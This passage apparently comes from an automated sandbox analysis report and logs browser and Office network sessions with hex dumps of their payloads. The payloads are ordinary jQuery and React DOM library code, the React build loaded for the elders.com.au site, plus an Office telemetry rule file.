                                                                                                                                                                                                            Data Ascii: &(S(Object(e))?C.merge(n,"string"==typeof e?[e]:e):c.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},isXMLDoc:function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument||e).documentElement;return!k.test(t||n&&n.nodeName||"HTML")},mer
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC1369INData Raw: 63 65 28 6a 2c 50 29 7d 3b 76 61 72 20 4d 3d 62 2c 4f 3d 63 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 6e 2c 6f 2c 61 2c 6c 2c 63 2c 64 2c 70 2c 68 2c 6d 3d 4f 2c 76 3d 43 2e 65 78 70 61 6e 64 6f 2c 79 3d 30 2c 62 3d 30 2c 77 3d 65 65 28 29 2c 78 3d 65 65 28 29 2c 4c 3d 65 65 28 29 2c 45 3d 65 65 28 29 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 74 26 26 28 61 3d 21 30 29 2c 30 7d 2c 53 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f
                                                                                                                                                                                                            Data Ascii: ce(j,P)};var M=b,O=c;!function(){var e,t,n,o,a,l,c,d,p,h,m=O,v=C.expando,y=0,b=0,w=ee(),x=ee(),L=ee(),E=ee(),k=function(e,t){return e===t&&(a=!0),0},S="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|reado
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC1369INData Raw: 5c 5c 66 5d 2a 5c 5c 29 7c 29 28 3f 3d 5b 5e 2d 5d 7c 24 29 22 2c 22 69 22 29 7d 2c 7a 3d 2f 5e 28 3f 3a 69 6e 70 75 74 7c 73 65 6c 65 63 74 7c 74 65 78 74 61 72 65 61 7c 62 75 74 74 6f 6e 29 24 2f 69 2c 58 3d 2f 5e 68 5c 64 24 2f 69 2c 4a 3d 2f 5e 28 3f 3a 23 28 5b 5c 77 2d 5d 2b 29 7c 28 5c 77 2b 29 7c 5c 2e 28 5b 5c 77 2d 5d 2b 29 29 24 2f 2c 56 3d 2f 5b 2b 7e 5d 2f 2c 59 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 5b 5c 5c 78 32 30 5c 5c 74 5c 5c 72 5c 5c 6e 5c 5c 66 5d 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 47 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e
                                                                                                                                                                                                            Data Ascii: \\f]*\\)|)(?=[^-]|$)","i")},z=/^(?:input|select|textarea|button)$/i,X=/^h\d$/i,J=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,V=/[+~]/,Y=new RegExp("\\\\[\\da-fA-F]{1,6}[\\x20\\t\\r\\n\\f]?|\\\\([^\\r\\n\\f])","g"),G=function(e,t){var n="0x"+e.slice(1)-65536;return
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC1369INData Raw: 29 75 5b 69 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 64 65 28 75 5b 69 5d 29 3b 66 3d 75 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 6d 2e 61 70 70 6c 79 28 6e 2c 68 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 66 29 29 2c 6e 7d 63 61 74 63 68 28 74 29 7b 45 28 65 2c 21 30 29 7d 66 69 6e 61 6c 6c 79 7b 73 3d 3d 3d 76 26 26 74 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 7d 7d 7d 72 65 74 75 72 6e 20 79 65 28 65 2e 72 65 70 6c 61 63 65 28 4e 2c 22 24 31 22 29 2c 74 2c 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 65 65 28 29 7b 76 61 72 20 65 3d 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 20 6e 28 72 2c 6f 29 7b 72 65 74 75 72 6e 20 65 2e 70 75 73 68 28 72 2b 22 20
                                                                                                                                                                                                            Data Ascii: )u[i]=(s?"#"+s:":scope")+" "+de(u[i]);f=u.join(",")}try{return m.apply(n,h.querySelectorAll(f)),n}catch(t){E(e,!0)}finally{s===v&&t.removeAttribute("id")}}}return ye(e.replace(N,"$1"),t,n,r)}function ee(){var e=[];return function n(r,o){return e.push(r+"
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC1369INData Raw: 67 65 74 42 79 49 64 3d 6e 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 63 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e 69 64 3d 43 2e 65 78 70 61 6e 64 6f 2c 21 6c 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 7c 7c 21 6c 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 28 43 2e 65 78 70 61 6e 64 6f 29 2e 6c 65 6e 67 74 68 7d 29 29 2c 67 2e 64 69 73 63 6f 6e 6e 65 63 74 65 64 4d 61 74 63 68 3d 6e 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 68 2e 63 61 6c 6c 28 65 2c 22 2a 22 29 7d 29 29 2c 67 2e 73 63 6f 70 65 3d 6e 65 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6c 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 73 63 6f 70 65 22 29 7d 29 29 2c 67 2e 63 73 73 48 61 73
                                                                                                                                                                                                            Data Ascii: getById=ne((function(e){return c.appendChild(e).id=C.expando,!l.getElementsByName||!l.getElementsByName(C.expando).length})),g.disconnectedMatch=ne((function(e){return h.call(e,"*")})),g.scope=ne((function(){return l.querySelectorAll(":scope")})),g.cssHas
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC1369INData Raw: 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 73 65 6c 65 63 74 65 64 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 70 2e 70 75 73 68 28 22 5c 5c 5b 5b 5c 5c 78 32 30 5c 5c 74 5c 5c 72 5c 5c 6e 5c 5c 66 5d 2a 28 3f 3a 76 61 6c 75 65 7c 22 2b 53 2b 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 69 64 7e 3d 22 2b 76 2b 22 2d 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 70 2e 70 75 73 68 28 22 7e 3d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 76 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 70 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 70 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22
                                                                                                                                                                                                            Data Ascii: ySelectorAll("[selected]").length||p.push("\\[[\\x20\\t\\r\\n\\f]*(?:value|"+S+")"),e.querySelectorAll("[id~="+v+"-]").length||p.push("~="),e.querySelectorAll("a#"+v+"+*").length||p.push(".#.+[+~]"),e.querySelectorAll(":checked").length||p.push(":checked"
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC1369INData Raw: 6e 67 74 68 3e 30 7d 2c 5a 2e 63 6f 6e 74 61 69 6e 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 21 3d 6c 26 26 6c 65 28 65 29 2c 43 2e 63 6f 6e 74 61 69 6e 73 28 65 2c 74 29 7d 2c 5a 2e 61 74 74 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 21 3d 6c 26 26 6c 65 28 65 29 3b 76 61 72 20 72 3d 74 2e 61 74 74 72 48 61 6e 64 6c 65 5b 6e 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 2c 6f 3d 72 26 26 66 2e 63 61 6c 6c 28 74 2e 61 74 74 72 48 61 6e 64 6c 65 2c 6e 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 3f 72 28 65 2c 6e 2c 21 64 29 3a 76 6f 69 64 20 30 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 21 3d 3d 6f 3f 6f 3a 65
                                                                                                                                                                                                            Data Ascii: ngth>0},Z.contains=function(e,t){return(e.ownerDocument||e)!=l&&le(e),C.contains(e,t)},Z.attr=function(e,n){(e.ownerDocument||e)!=l&&le(e);var r=t.attrHandle[n.toLowerCase()],o=r&&f.call(t.attrHandle,n.toLowerCase())?r(e,n,!d):void 0;return void 0!==o?o:e


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            79192.168.2.457752104.17.245.2034432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC579OUTGET /react-dom@18.3.1/umd/react-dom.development.js HTTP/1.1
                                                                                                                                                                                                            Host: unpkg.com
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            Origin: https://elders.com.au
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC577INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:49 GMT
                                                                                                                                                                                                            Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                            cache-control: public, max-age=31536000
                                                                                                                                                                                                            last-modified: Sat, 26 Oct 1985 08:15:00 GMT
                                                                                                                                                                                                            etag: W/"107ba3-qzvQLFMixpPr5ugkuocUHlejoYo"
                                                                                                                                                                                                            via: 1.1 fly.io
                                                                                                                                                                                                            fly-request-id: 01JBP8SYNDQWRGJS64H9J83K3V-dfw
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Age: 325474
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b025a883e722-DFW
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC792INData Raw: 37 64 35 66 0d 0a 2f 2a 2a 0a 20 2a 20 40 6c 69 63 65 6e 73 65 20 52 65 61 63 74 0a 20 2a 20 72 65 61 63 74 2d 64 6f 6d 2e 64 65 76 65 6c 6f 70 6d 65 6e 74 2e 6a 73 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 61 6e 64 20 69 74 73 20 61 66 66 69 6c 69 61 74 65 73 2e 0a 20 2a 0a 20 2a 20 54 68 69 73 20 73 6f 75 72 63 65 20 63 6f 64 65 20 69 73 20 6c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 20 66 6f 75 6e 64 20 69 6e 20 74 68 65 0a 20 2a 20 4c 49 43 45 4e 53 45 20 66 69 6c 65 20 69 6e 20 74 68 65 20 72 6f 6f 74 20 64 69 72 65 63 74 6f 72 79 20 6f 66 20 74 68 69 73 20 73 6f 75 72 63 65 20 74 72 65 65 2e 0a 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 20 28
                                                                                                                                                                                                            Data Ascii: 7d5f/** * @license React * react-dom.development.js * * Copyright (c) Facebook, Inc. and its affiliates. * * This source code is licensed under the MIT license found in the * LICENSE file in the root directory of this source tree. */(function (
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC1369INData Raw: 77 53 75 70 70 72 65 73 73 57 61 72 6e 69 6e 67 3b 0a 20 20 20 20 7d 0a 20 20 7d 20 2f 2f 20 49 6e 20 44 45 56 2c 20 63 61 6c 6c 73 20 74 6f 20 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 20 61 6e 64 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 20 67 65 74 20 72 65 70 6c 61 63 65 64 0a 20 20 2f 2f 20 62 79 20 63 61 6c 6c 73 20 74 6f 20 74 68 65 73 65 20 6d 65 74 68 6f 64 73 20 62 79 20 61 20 42 61 62 65 6c 20 70 6c 75 67 69 6e 2e 0a 20 20 2f 2f 0a 20 20 2f 2f 20 49 6e 20 50 52 4f 44 20 28 6f 72 20 69 6e 20 70 61 63 6b 61 67 65 73 20 77 69 74 68 6f 75 74 20 61 63 63 65 73 73 20 74 6f 20 52 65 61 63 74 20 69 6e 74 65 72 6e 61 6c 73 29 2c 0a 20 20 2f 2f 20 74 68 65 79 20 61 72 65 20 6c 65 66 74 20 61 73 20 74 68 65 79 20 61 72 65 20 69 6e 73 74 65 61 64 2e 0a 0a 20 20
                                                                                                                                                                                                            Data Ascii: wSuppressWarning; } } // In DEV, calls to console.warn and console.error get replaced // by calls to these methods by a Babel plugin. // // In PROD (or in packages without access to React internals), // they are left as they are instead.
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC1369INData Raw: 65 6d 29 20 7b 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 53 74 72 69 6e 67 28 69 74 65 6d 29 3b 0a 20 20 20 20 20 20 7d 29 3b 20 2f 2f 20 43 61 72 65 66 75 6c 3a 20 52 4e 20 63 75 72 72 65 6e 74 6c 79 20 64 65 70 65 6e 64 73 20 6f 6e 20 74 68 69 73 20 70 72 65 66 69 78 0a 0a 20 20 20 20 20 20 61 72 67 73 57 69 74 68 46 6f 72 6d 61 74 2e 75 6e 73 68 69 66 74 28 27 57 61 72 6e 69 6e 67 3a 20 27 20 2b 20 66 6f 72 6d 61 74 29 3b 20 2f 2f 20 57 65 20 69 6e 74 65 6e 74 69 6f 6e 61 6c 6c 79 20 64 6f 6e 27 74 20 75 73 65 20 73 70 72 65 61 64 20 28 6f 72 20 2e 61 70 70 6c 79 29 20 64 69 72 65 63 74 6c 79 20 62 65 63 61 75 73 65 20 69 74 0a 20 20 20 20 20 20 2f 2f 20 62 72 65 61 6b 73 20 49 45 39 3a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f
                                                                                                                                                                                                            Data Ascii: em) { return String(item); }); // Careful: RN currently depends on this prefix argsWithFormat.unshift('Warning: ' + format); // We intentionally don't use spread (or .apply) directly because it // breaks IE9: https://github.com/
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC1369INData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 0a 20 20 76 61 72 20 65 6e 61 62 6c 65 43 6c 69 65 6e 74 52 65 6e 64 65 72 46 61 6c 6c 62 61 63 6b 4f 6e 54 65 78 74 4d 69 73 6d 61 74 63 68 20 3d 20 74 72 75 65 3b 20 2f 2f 20 54 4f 44 4f 3a 20 4e 65 65 64 20 74 6f 20 72 65 76 69 65 77 20 74 68 69 73 20 63 6f 64 65 20 6f 6e 65 20 6d 6f 72 65 20 74 69 6d 65 20 62 65 66 6f 72 65 20 6c 61 6e 64 69 6e 67 0a 20 20 2f 2f 20 74 68 65 20 72 65 61 63 74 2d 72 65 63 6f 6e 63 69 6c 65 72 20 70 61 63 6b 61 67 65 2e 0a 0a 20 20 76 61 72 20 65 6e 61 62 6c 65 4e 65 77 52 65 63 6f 6e 63 69 6c 65 72 20 3d 20 66 61 6c 73 65 3b 20 2f 2f 20 53 75 70 70 6f 72 74 20 6c 65 67 61 63 79 20 50 72 69 6d 65 72 20 73 75 70 70 6f 72 74 20 6f 6e 20 69 6e 74 65 72 6e 61 6c 20 46 42 20
                                                                                                                                                                                                            Data Ascii: ---------------- var enableClientRenderFallbackOnTextMismatch = true; // TODO: Need to review this code one more time before landing // the react-reconciler package. var enableNewReconciler = false; // Support legacy Primer support on internal FB
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC1369INData Raw: 20 66 6f 72 20 3c 74 65 78 74 61 72 65 61 3e 20 65 6c 65 6d 65 6e 74 73 0a 20 20 76 61 72 20 77 61 72 6e 41 62 6f 75 74 53 74 72 69 6e 67 52 65 66 73 20 3d 20 74 72 75 65 3b 20 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 20 2f 2f 20 44 65 62 75 67 67 69 6e 67 20 61 6e 64 20 44 65 76 54 6f 6f 6c 73 0a 20 20 2f 2f 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 20 2f 2f
                                                                                                                                                                                                            Data Ascii: for <textarea> elements var warnAboutStringRefs = true; // ----------------------------------------------------------------------------- // Debugging and DevTools // ----------------------------------------------------------------------------- //
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC1369INData Raw: 0a 20 20 7d 0a 20 20 66 75 6e 63 74 69 6f 6e 20 72 65 67 69 73 74 65 72 44 69 72 65 63 74 45 76 65 6e 74 28 72 65 67 69 73 74 72 61 74 69 6f 6e 4e 61 6d 65 2c 20 64 65 70 65 6e 64 65 6e 63 69 65 73 29 20 7b 0a 20 20 20 20 7b 0a 20 20 20 20 20 20 69 66 20 28 72 65 67 69 73 74 72 61 74 69 6f 6e 4e 61 6d 65 44 65 70 65 6e 64 65 6e 63 69 65 73 5b 72 65 67 69 73 74 72 61 74 69 6f 6e 4e 61 6d 65 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 65 72 72 6f 72 28 27 45 76 65 6e 74 52 65 67 69 73 74 72 79 3a 20 4d 6f 72 65 20 74 68 61 6e 20 6f 6e 65 20 70 6c 75 67 69 6e 20 61 74 74 65 6d 70 74 65 64 20 74 6f 20 70 75 62 6c 69 73 68 20 74 68 65 20 73 61 6d 65 20 27 20 2b 20 27 72 65 67 69 73 74 72 61 74 69 6f 6e 20 6e 61 6d 65 2c 20 60 25 73 60 2e 27 2c 20 72 65 67 69 73 74
                                                                                                                                                                                                            Data Ascii: } function registerDirectEvent(registrationName, dependencies) { { if (registrationNameDependencies[registrationName]) { error('EventRegistry: More than one plugin attempted to publish the same ' + 'registration name, `%s`.', regist
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC1369INData Raw: 2f 2f 20 24 46 6c 6f 77 46 69 78 4d 65 20 6f 6e 6c 79 20 63 61 6c 6c 65 64 20 69 6e 20 44 45 56 2c 20 73 6f 20 76 6f 69 64 20 72 65 74 75 72 6e 20 69 73 20 6e 6f 74 20 70 6f 73 73 69 62 6c 65 2e 0a 20 20 66 75 6e 63 74 69 6f 6e 20 74 79 70 65 4e 61 6d 65 28 76 61 6c 75 65 29 20 7b 0a 20 20 20 20 7b 0a 20 20 20 20 20 20 2f 2f 20 74 6f 53 74 72 69 6e 67 54 61 67 20 69 73 20 6e 65 65 64 65 64 20 66 6f 72 20 6e 61 6d 65 73 70 61 63 65 64 20 74 79 70 65 73 20 6c 69 6b 65 20 54 65 6d 70 6f 72 61 6c 2e 49 6e 73 74 61 6e 74 0a 20 20 20 20 20 20 76 61 72 20 68 61 73 54 6f 53 74 72 69 6e 67 54 61 67 20 3d 20 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 20 3d 3d 3d 20 27 66 75 6e 63 74 69 6f 6e 27 20 26 26 20 53 79 6d 62 6f 6c 2e 74 6f 53 74 72 69 6e 67 54 61 67 3b 0a 20
                                                                                                                                                                                                            Data Ascii: // $FlowFixMe only called in DEV, so void return is not possible. function typeName(value) { { // toStringTag is needed for namespaced types like Temporal.Instant var hasToStringTag = typeof Symbol === 'function' && Symbol.toStringTag;
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC1369INData Raw: 6b 65 20 60 3e 3d 60 20 62 65 63 61 75 73 65 20 63 75 73 74 6f 6d 0a 20 20 20 20 2f 2f 20 6d 65 74 68 6f 64 73 20 61 72 65 20 6e 65 65 64 65 64 20 74 6f 20 70 65 72 66 6f 72 6d 20 61 63 63 75 72 61 74 65 20 61 72 69 74 68 6d 65 74 69 63 20 6f 72 20 63 6f 6d 70 61 72 69 73 6f 6e 2e 29 0a 20 20 20 20 2f 2f 0a 20 20 20 20 2f 2f 20 54 6f 20 66 69 78 20 74 68 65 20 70 72 6f 62 6c 65 6d 2c 20 63 6f 65 72 63 65 20 74 68 69 73 20 6f 62 6a 65 63 74 20 6f 72 20 73 79 6d 62 6f 6c 20 76 61 6c 75 65 20 74 6f 20 61 20 73 74 72 69 6e 67 20 62 65 66 6f 72 65 0a 20 20 20 20 2f 2f 20 70 61 73 73 69 6e 67 20 69 74 20 74 6f 20 52 65 61 63 74 2e 20 54 68 65 20 6d 6f 73 74 20 72 65 6c 69 61 62 6c 65 20 77 61 79 20 69 73 20 75 73 75 61 6c 6c 79 20 60 53 74 72 69 6e 67 28 76 61
                                                                                                                                                                                                            Data Ascii: ke `>=` because custom // methods are needed to perform accurate arithmetic or comparison.) // // To fix the problem, coerce this object or symbol value to a string before // passing it to React. The most reliable way is usually `String(va
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC1369INData Raw: 25 73 2e 27 20 2b 20 27 20 54 68 69 73 20 76 61 6c 75 65 20 6d 75 73 74 20 62 65 20 63 6f 65 72 63 65 64 20 74 6f 20 61 20 73 74 72 69 6e 67 20 62 65 66 6f 72 65 20 62 65 66 6f 72 65 20 75 73 69 6e 67 20 69 74 20 68 65 72 65 2e 27 2c 20 74 79 70 65 4e 61 6d 65 28 76 61 6c 75 65 29 29 3b 0a 0a 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 74 65 73 74 53 74 72 69 6e 67 43 6f 65 72 63 69 6f 6e 28 76 61 6c 75 65 29 3b 20 2f 2f 20 74 68 72 6f 77 20 28 74 6f 20 68 65 6c 70 20 63 61 6c 6c 65 72 73 20 66 69 6e 64 20 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 20 63 6f 6d 6d 65 6e 74 73 29 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 7d 0a 20 20 66 75 6e 63 74 69 6f 6e 20 63 68 65 63 6b 50 72 6f 70 53 74 72 69 6e 67 43 6f 65 72 63 69 6f 6e 28 76 61 6c 75 65
                                                                                                                                                                                                            Data Ascii: %s.' + ' This value must be coerced to a string before before using it here.', typeName(value)); return testStringCoercion(value); // throw (to help callers find troubleshooting comments) } } } function checkPropStringCoercion(value
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC1369INData Raw: 0a 20 20 7d 0a 20 20 66 75 6e 63 74 69 6f 6e 20 63 68 65 63 6b 46 6f 72 6d 46 69 65 6c 64 56 61 6c 75 65 53 74 72 69 6e 67 43 6f 65 72 63 69 6f 6e 28 76 61 6c 75 65 29 20 7b 0a 20 20 20 20 7b 0a 20 20 20 20 20 20 69 66 20 28 77 69 6c 6c 43 6f 65 72 63 69 6f 6e 54 68 72 6f 77 28 76 61 6c 75 65 29 29 20 7b 0a 20 20 20 20 20 20 20 20 65 72 72 6f 72 28 27 46 6f 72 6d 20 66 69 65 6c 64 20 76 61 6c 75 65 73 20 28 76 61 6c 75 65 2c 20 63 68 65 63 6b 65 64 2c 20 64 65 66 61 75 6c 74 56 61 6c 75 65 2c 20 6f 72 20 64 65 66 61 75 6c 74 43 68 65 63 6b 65 64 20 70 72 6f 70 73 29 27 20 2b 20 27 20 6d 75 73 74 20 62 65 20 73 74 72 69 6e 67 73 2c 20 6e 6f 74 20 25 73 2e 27 20 2b 20 27 20 54 68 69 73 20 76 61 6c 75 65 20 6d 75 73 74 20 62 65 20 63 6f 65 72 63 65 64 20 74
                                                                                                                                                                                                            Data Ascii: } function checkFormFieldValueStringCoercion(value) { { if (willCoercionThrow(value)) { error('Form field values (value, checked, defaultValue, or defaultChecked props)' + ' must be strings, not %s.' + ' This value must be coerced t


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            80192.168.2.45774713.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:49 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 425
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BBA25094F"
                                                                                                                                                                                                            x-ms-request-id: 1504f0f6-801e-0015-3c58-2ef97f000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052949Z-17df447cdb5fzdpxhC1DFWdd3400000002eg00000000027v
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:49 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
